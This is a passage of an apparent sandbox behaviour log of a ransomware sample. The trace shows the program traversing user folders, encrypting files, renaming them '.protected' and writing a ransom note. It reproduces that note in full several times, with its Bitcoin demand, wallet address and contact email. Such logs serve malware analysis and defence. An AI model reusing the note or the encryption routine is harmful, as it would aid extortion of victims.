lpNewFilePointer=0x0) returned 1 [0094.851] WriteFile (in: 
hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.851] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.851] CloseHandle (hObject=0x150) returned 1 [0094.851] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 116 [0094.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0094.852] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0094.852] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0094.853] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0094.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.853] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0094.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0094.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0094.853] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x130, lpOverlapped=0x0) returned 1 [0094.854] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.854] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x130, lpOverlapped=0x0) returned 1 [0094.855] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.855] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.855] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.855] CloseHandle (hObject=0x150) returned 1 [0094.855] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected") returned 116 [0094.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected" (normalized: 
"c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0094.856] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.856] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.856] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt") returned 91 [0094.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.858] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.858] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.859] lstrlenA (lpString="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") returned 684 [0094.859] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.859] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.859] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.859] CloseHandle (hObject=0x14c) returned 1 [0094.860] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.860] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.860] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt") returned 82 [0094.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.861] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.861] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.862] lstrlenA (lpString="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") returned 684 [0094.862] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.862] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.862] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.862] CloseHandle (hObject=0xd8) returned 1 [0094.862] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.862] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.863] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt") returned 65 [0094.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.863] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.864] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.864] lstrlenA (lpString="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") returned 684 [0094.864] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.865] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.865] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.865] CloseHandle (hObject=0xd4) returned 1 [0094.865] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0094.865] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0094.865] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\RESTORE_FILES.txt") returned 55 [0094.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0094.866] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.866] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0094.878] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.878] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0094.878] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.878] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0094.878] CloseHandle (hObject=0xb4) returned 1 [0094.879] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="Windows") returned -1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="Program Files") returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="Program Files (x86)") returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="$Recycle.bin") returned 1 [0094.879] lstrcmpiW (lpString1="Roaming", lpString2="System Volume Information") returned -1 [0094.879] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned 36 [0094.879] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0094.879] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0094.879] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*") returned 38 [0094.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0094.880] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.880] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0094.880] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.880] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.880] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.880] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\.") returned 38 [0094.880] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.880] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.880] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.880] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.880] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.880] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.880] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.880] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\..") returned 39 [0094.880] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.880] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="Windows") returned -1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="Program Files") returned -1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="Program Files (x86)") returned -1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="$Recycle.bin") returned 1 [0094.880] lstrcmpiW (lpString1="Identities", lpString2="System Volume Information") returned -1 [0094.880] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned 47 [0094.880] lstrcmpW 
(lpString1="Identities", lpString2=".") returned 1 [0094.880] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0094.881] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*") returned 49 [0094.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.881] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.881] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.882] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\.") returned 49 [0094.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.882] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.882] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.882] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.882] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.882] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\..") returned 50 [0094.882] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.882] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.882] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) 
returned 1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Windows") returned -1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files") returned -1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files (x86)") returned -1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="$Recycle.bin") returned 1 [0094.882] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="System Volume Information") returned -1 [0094.882] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 86 [0094.882] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0094.882] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned 88 [0094.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.883] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.883] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.883] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.883] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.883] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 